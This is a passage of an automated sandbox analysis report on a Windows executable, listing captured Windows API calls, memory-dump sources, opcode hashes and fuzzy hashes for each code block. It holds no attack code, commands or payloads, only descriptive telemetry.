                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$LongParentVisible
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 506644340-0
                                                                                                                                              • Opcode ID: 45eadc8b458de43bde7c9e092fd1932caba4420e0a9f48f5c06109cc70392342
                                                                                                                                              • Instruction ID: ebd6f0984fa48f2bf8ba37bc0dad7d39dec8952187d8cbd4be4ea4dd5bc4bcd7
                                                                                                                                              • Opcode Fuzzy Hash: 45eadc8b458de43bde7c9e092fd1932caba4420e0a9f48f5c06109cc70392342
                                                                                                                                              • Instruction Fuzzy Hash: 6121F5317007216BC7306B659C09FAB77ACEFC2798F45053ABA41DB251C72CDC4686AC
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetClassInfoA.USER32(?,?,?), ref: 0042342F
                                                                                                                                              • RegisterClassA.USER32(00000004), ref: 00423442
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Class$InfoRegister
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2278207768-0
                                                                                                                                              • Opcode ID: ae984635e655e5db520392ed793df418be20265cf8730173f5c4cd27a1fe2e35
                                                                                                                                              • Instruction ID: 0db0b4e4c4e337a484aff126d2be670c2f0469505d5c1c4381f3c1d533b8c960
                                                                                                                                              • Opcode Fuzzy Hash: ae984635e655e5db520392ed793df418be20265cf8730173f5c4cd27a1fe2e35
                                                                                                                                              • Instruction Fuzzy Hash: 8A21D831600214EFCB11EF61DD44BAE7BF8EF44715F80456AF84692150C738E606DB69
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,?,00000000), ref: 0042BC36
                                                                                                                                              • RegCreateKeyExA.ADVAPI32(?,00000000,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 0042BC59
                                                                                                                                              • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 0042BC75
                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0042BC85
                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0042BC8F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseCreate$Open
                                                                                                                                              • String ID: software
                                                                                                                                              • API String ID: 1740278721-2010147023
                                                                                                                                              • Opcode ID: a07ef03d32e418125c98845893222a59e1d7b78c696368899b11d02bf983a4c5
                                                                                                                                              • Instruction ID: 64b97b5fe25ac38e929414c9c763e2fcce4b8d3dd38ef5aad07515420139dc36
                                                                                                                                              • Opcode Fuzzy Hash: a07ef03d32e418125c98845893222a59e1d7b78c696368899b11d02bf983a4c5
                                                                                                                                              • Instruction Fuzzy Hash: 0411CB76A00258FB9B21DF9ADD84CDFBFBCEF85700B5000BAA504A2111D7719A45DBA4
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040D09A
                                                                                                                                              • GetSystemMetrics.USER32(00000000), ref: 0040D0B2
                                                                                                                                              • GetSystemMetrics.USER32(00000001), ref: 0040D0B9
                                                                                                                                              • lstrcpyA.KERNEL32(?,DISPLAY), ref: 0040D0DD
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: System$Metrics$InfoParameterslstrcpy
                                                                                                                                              • String ID: B$DISPLAY
                                                                                                                                              • API String ID: 1409579217-3316187204
                                                                                                                                              • Opcode ID: aa875fb899d8b8cdc6035337f91c3cfdfa7e814ee4d75c511dac12003764187e
                                                                                                                                              • Instruction ID: 7d79b360eed3925eabdee55bcf9e6e46b2a378b8c0ece8e258d689888b9aa654
                                                                                                                                              • Opcode Fuzzy Hash: aa875fb899d8b8cdc6035337f91c3cfdfa7e814ee4d75c511dac12003764187e
                                                                                                                                              • Instruction Fuzzy Hash: 3211C671A00224DBCF219FA4DC8095BBBB8EF05744F408077FD09BA141C274D916CBE9
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • SetErrorMode.KERNEL32(00000000,00000000,004282FD,?,?,?,?), ref: 0042BF99
                                                                                                                                              • SetErrorMode.KERNEL32(00000000), ref: 0042BFA1
                                                                                                                                              • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042BFEC
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 0042BFFC
                                                                                                                                                • Part of subcall function 0042BE69: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0042BEA5
                                                                                                                                                • Part of subcall function 0042BE69: PathFindExtensionA.SHLWAPI(?), ref: 0042BEB2
                                                                                                                                                • Part of subcall function 0042BE69: lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 0042BF3D
                                                                                                                                                • Part of subcall function 0042BE69: lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 0042BF6A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorModeModule$AddressExtensionFileFindHandleNamePathProclstrcatlstrcpy
                                                                                                                                              • String ID: NotifyWinEvent$user32.dll
                                                                                                                                              • API String ID: 4004864024-597752486
                                                                                                                                              • Opcode ID: c693ce6a2e765cc9099c900ab09abb04ea83f55a69a3113b2ed044f042921076
                                                                                                                                              • Instruction ID: 8050f7acd3555061b9cb0811210370212b3dde1f57db23d13128c8b76d78117c
                                                                                                                                              • Opcode Fuzzy Hash: c693ce6a2e765cc9099c900ab09abb04ea83f55a69a3113b2ed044f042921076
                                                                                                                                              • Instruction Fuzzy Hash: 89016D75B40260DFC720EF65E904A5A3BA4EF04700F8684AFF944D7362DB78D840CBAA
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • DeleteCriticalSection.KERNEL32(76170A60,76170A60,00000000,?,00419CD6,00419D7E,00415EBE,?,0043A478,00000060), ref: 0041875C
                                                                                                                                                • Part of subcall function 004153EC: HeapFree.KERNEL32(00000000,?,0043A458,0000000C,00418764,76170A60,?,00419CD6,00419D7E,00415EBE,?,0043A478,00000060), ref: 00415451
                                                                                                                                              • DeleteCriticalSection.KERNEL32(00000000,00000000,?,00419CD6,00419D7E,00415EBE,?,0043A478,00000060), ref: 00418786
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalDeleteSection$FreeHeap
                                                                                                                                              • String ID: @ED$@ED$`FD$`FD
                                                                                                                                              • API String ID: 447823528-2709115982
                                                                                                                                              • Opcode ID: 11b09ba00ba531dec1240bf4f5251c78e4240dee3c1046bbdde13b47f6cc61b2
                                                                                                                                              • Instruction ID: df23414061cf168004c6de2c13b304607e6d267cc1c22f5936ebd44bd2e4ff4c
                                                                                                                                              • Opcode Fuzzy Hash: 11b09ba00ba531dec1240bf4f5251c78e4240dee3c1046bbdde13b47f6cc61b2
                                                                                                                                              • Instruction Fuzzy Hash: 7FF0A732D4032457EA306909ACC4BE6A2E89FD1722735403FDCB893250CB3DDCC1826D
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 00426E80
                                                                                                                                              • GetSysColor.USER32(00000010), ref: 00426E87
                                                                                                                                              • GetSysColor.USER32(00000014), ref: 00426E8E
                                                                                                                                              • GetSysColor.USER32(00000012), ref: 00426E95
                                                                                                                                              • GetSysColor.USER32(00000006), ref: 00426E9C
                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00426EA9
                                                                                                                                              • GetSysColorBrush.USER32(00000006), ref: 00426EB0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Color$Brush
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2798902688-0
                                                                                                                                              • Opcode ID: 217f39869b888a1c3749961ae9e7e8c44d1ab5d44a913a51842b180abdde359a
                                                                                                                                              • Instruction ID: 849f2a7d79a27e67f6fb90856910374a9d4c7919ec4fb8f2b3bca5a51304e481
                                                                                                                                              • Opcode Fuzzy Hash: 217f39869b888a1c3749961ae9e7e8c44d1ab5d44a913a51842b180abdde359a
                                                                                                                                              • Instruction Fuzzy Hash: D6F0F871A407489BD730BB729D09B47BAE1FFC4B10F42093EE2818BA90E6B6E0419F44
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 025C7530: GetFileInformationByHandle.KERNEL32(?,?), ref: 025C7559
                                                                                                                                                • Part of subcall function 025C7530: GetFileInformationByHandleEx.KERNEL32(?,00000009,?,00000008), ref: 025C758C
                                                                                                                                              • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001), ref: 025C825E
                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000), ref: 025C82DF
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025C82F0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$FreeHandleHeapInformation$Pointer
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1293978381-0
                                                                                                                                              • Opcode ID: dc664c260c91812ab4554c73750211dbec525b391e51e12b5801d7689d327623
                                                                                                                                              • Instruction ID: dc23025c4b355437162575c2e93ab0608df6f2f27e0ce2ac762b94bfa2d3693b
                                                                                                                                              • Opcode Fuzzy Hash: dc664c260c91812ab4554c73750211dbec525b391e51e12b5801d7689d327623
                                                                                                                                              • Instruction Fuzzy Hash: 10F1F574600B00CFD725CF69C588B66BBF2BB49314F24892DD99A8BBA1E771F845CB44
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • MapDialogRect.USER32(?,?), ref: 0040CA8F
                                                                                                                                              • SysAllocStringLen.OLEAUT32(?,00000000), ref: 0040CAB0
                                                                                                                                              • CLSIDFromString.OLE32(?,?), ref: 0040CBAE
                                                                                                                                              • CLSIDFromProgID.OLE32(?,?), ref: 0040CBB6
                                                                                                                                              • SetWindowPos.USER32(00000004,?,00000000,00000000,00000000,00000000,00000013,00000001,00000000,?,00000000,?,?,?,0000FC84,00000000), ref: 0040CC52
                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 0040CCA5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: String$From$AllocDialogFreeProgRectWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 704962466-0
                                                                                                                                              • Opcode ID: b6569829184fb42d57513ac240686ddfc2199f8f1beda4693de8370a87d1c167
                                                                                                                                              • Instruction ID: b945ffafd8d0b2f29bc3912b9e04def262169b811155d546c73b7a037650a840
                                                                                                                                              • Opcode Fuzzy Hash: b6569829184fb42d57513ac240686ddfc2199f8f1beda4693de8370a87d1c167
                                                                                                                                              • Instruction Fuzzy Hash: 85B1397190021ADFCB04DFA5D884AEEB7B4FF08304F10463AE819A7391D778A955CFA9
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetStringTypeW.KERNEL32(00000001,0043A9D4,00000001,?,0043B460,00000024,0041C7B7,00000001,00000100,00000001,00000000,00000000,?,?,?,004175A9), ref: 0041F7B1
                                                                                                                                              • GetLastError.KERNEL32(?,?,004175A9,?,00000000,00000008), ref: 0041F7C3
                                                                                                                                              • GetStringTypeW.KERNEL32(?,00000100,?,?,0043B460,00000024,0041C7B7,00000001,00000100,00000001,00000000,00000000,?,?,?,004175A9), ref: 0041F7ED
                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000100,?,00000000,00000000,00000000,00000000,0043B460,00000024,0041C7B7,00000001,00000100,00000001,00000000,00000000), ref: 0041F845
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000100,00000000,?,00000000,00000000,00000000), ref: 0041F8C8
                                                                                                                                              • GetStringTypeA.KERNEL32(?,?,?,00000000,?), ref: 0041F95A
                                                                                                                                                • Part of subcall function 0041D4E0: HeapAlloc.KERNEL32(00000008,?,0043B1F8,00000010,00419D17,00000001,00000088,?,00418843,?,?,?,0041540F,00000004,0043A458,0000000C), ref: 0041D562
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1390108997-0
                                                                                                                                              • Opcode ID: b1f97acda3f09c8697856c99fe5127e31a16a89ed682065aa7c50ce2c0f9515f
                                                                                                                                              • Instruction ID: a57df6695b7da8b7aa1c592e969f3bb102772f76e478128afaf792e3acbf193c
                                                                                                                                              • Opcode Fuzzy Hash: b1f97acda3f09c8697856c99fe5127e31a16a89ed682065aa7c50ce2c0f9515f
                                                                                                                                              • Instruction Fuzzy Hash: 40517F71910219EBCF21AFA5DC45AEE7BB4FF05764B60413BF814A2260C3388996DB98
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025857F5
                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 025858DF
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02585969
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 025860B5
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 025860D2
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 02586105
                                                                                                                                              Strings
                                                                                                                                              • falsetrue\"\\\b\f\n\r\t0123456789abcdef[],{ ,, xrefs: 02585890
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID: falsetrue\"\\\b\f\n\r\t0123456789abcdef[],{ ,
                                                                                                                                              • API String ID: 3298025750-2845428148
                                                                                                                                              • Opcode ID: 653e2d8ae5676c7c9899519fb57515c4b15f1185e29f8fc06a1dfaab56c20e4e
                                                                                                                                              • Instruction ID: 93a522d8998648034d52de4074a3eb86cc062da7caddb852b3b5f59fb0937f4c
                                                                                                                                              • Opcode Fuzzy Hash: 653e2d8ae5676c7c9899519fb57515c4b15f1185e29f8fc06a1dfaab56c20e4e
                                                                                                                                              • Instruction Fuzzy Hash: 7B6114B1904301DFDB25EF20D884B9A7BE6BF84304F448869DC49AF259EB719845CF5A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetStringTypeW.KERNEL32(00000001,0043A9D4,00000001,?,0043A9D8,0000001C,00417C5C,00000001,00000020,00000100,?,00000000), ref: 0041B224
                                                                                                                                              • GetLastError.KERNEL32 ref: 0041B236
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000000,00417F33,00000000,00000000,0043A9D8,0000001C,00417C5C,00000001,00000020,00000100,?,00000000), ref: 0041B298
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,00000000,00417F33,?,00000000), ref: 0041B316
                                                                                                                                              • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 0041B328
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharMultiStringTypeWide$ErrorLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3581945363-0
                                                                                                                                              • Opcode ID: 9575601df985ec698041be843986eb33e77f2bc8172fa7f9b26e48780cd960a8
                                                                                                                                              • Instruction ID: 9f9fa65cc8421391b8d21a05cfa14ba1f88a212ef66fffe92425adc452bd7f2d
                                                                                                                                              • Opcode Fuzzy Hash: 9575601df985ec698041be843986eb33e77f2bc8172fa7f9b26e48780cd960a8
                                                                                                                                              • Instruction Fuzzy Hash: 7C419271900618EBCB218F55DC45AEF3B75FF49760F15012AFC20A62A0C739C9A1CBE9
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • TlsGetValue.KERNEL32(0044AED8,00000000,?,00000000,0042BB47,?,00000000,?,?,?,?,0042B380,00429E06,0040C70D), ref: 0042B8FF
                                                                                                                                              • EnterCriticalSection.KERNEL32(0044AEF4,00000010,?,00000000,0042BB47,?,00000000,?,?,?,?,0042B380,00429E06,0040C70D), ref: 0042B948
                                                                                                                                              • LeaveCriticalSection.KERNEL32(0044AEF4,?,00000000,0042BB47,?,00000000,?,?,?,?,0042B380,00429E06,0040C70D), ref: 0042B95B
                                                                                                                                              • LocalAlloc.KERNEL32(00000000,00000003,?,00000000,0042BB47,?,00000000,?,?,?,?,0042B380,00429E06,0040C70D), ref: 0042B972
                                                                                                                                              • LocalReAlloc.KERNEL32(?,00000003,00000002,?,00000000,0042BB47,?,00000000,?,?,?,?,0042B380,00429E06,0040C70D), ref: 0042B984
                                                                                                                                              • TlsSetValue.KERNEL32(0044AED8,00000000), ref: 0042B9BB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocCriticalLocalSectionValue$EnterLeave
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4117633390-0
                                                                                                                                              • Opcode ID: 425f8b4d3ef0bcdaa6e9ca825a8bff2006c201a408e1851a73cd36e6840e37b7
                                                                                                                                              • Instruction ID: a6b77f6463ff9e4dcbf2f81cc0fabf44c3931403c77961276365c9ec7d0f809c
                                                                                                                                              • Opcode Fuzzy Hash: 425f8b4d3ef0bcdaa6e9ca825a8bff2006c201a408e1851a73cd36e6840e37b7
                                                                                                                                              • Instruction Fuzzy Hash: E2215CB1600622EFC324DF65E884C26B7E8FF48310790893EE55AC3610D734EC95CBA9
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 0042930D
                                                                                                                                              • GetParent.USER32(?), ref: 0042931B
                                                                                                                                              • GetParent.USER32(?), ref: 0042932E
                                                                                                                                              • GetLastActivePopup.USER32(?), ref: 0042933D
                                                                                                                                              • IsWindowEnabled.USER32(?), ref: 00429352
                                                                                                                                              • EnableWindow.USER32(?,00000000), ref: 00429365
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 670545878-0
                                                                                                                                              • Opcode ID: 1a1af78537e06c800fa254dbed7e3f0734006fd546e1ad9da5c44e88e9679358
                                                                                                                                              • Instruction ID: 80255c199b8a0bdecbbc8602bee05c6d705c4b7d3c7af4284fa55a0f5ebffd36
                                                                                                                                              • Opcode Fuzzy Hash: 1a1af78537e06c800fa254dbed7e3f0734006fd546e1ad9da5c44e88e9679358
                                                                                                                                              • Instruction Fuzzy Hash: B011A332B0123157C631AA6A7C44B6BB2AC9F6DB60FD50177ED04D3391DB68CC02469D
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • ClientToScreen.USER32(?,?), ref: 00428DC9
                                                                                                                                              • GetDlgCtrlID.USER32(00000000), ref: 00428DDD
                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 00428DEB
                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00428DFD
                                                                                                                                              • PtInRect.USER32(?,?,?), ref: 00428E0D
                                                                                                                                              • GetWindow.USER32(?,00000005), ref: 00428E1A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1315500227-0
                                                                                                                                              • Opcode ID: bddc417178efcb5005f3e382842a7ec5c5d359559d9cbc29fe9ccca2d6545a96
                                                                                                                                              • Instruction ID: 86bcff5dc365ccf3970e8e5ad6cd2e1a487aebd333d05296c5cf9a855bdfcbb6
                                                                                                                                              • Opcode Fuzzy Hash: bddc417178efcb5005f3e382842a7ec5c5d359559d9cbc29fe9ccca2d6545a96
                                                                                                                                              • Instruction Fuzzy Hash: 46014F36301229ABDB21AF54AC08EAF3B78AF55B51FC14039FD11D6164DB3499168A98
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetObjectA.GDI32(0040D840,0000003C,?), ref: 0040E574
                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0040E585
                                                                                                                                              • GetDeviceCaps.GDI32(?,0000005A), ref: 0040E5F9
                                                                                                                                              • OleCreateFontIndirect.OLEAUT32(00000020,0043B660,?), ref: 0040E625
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
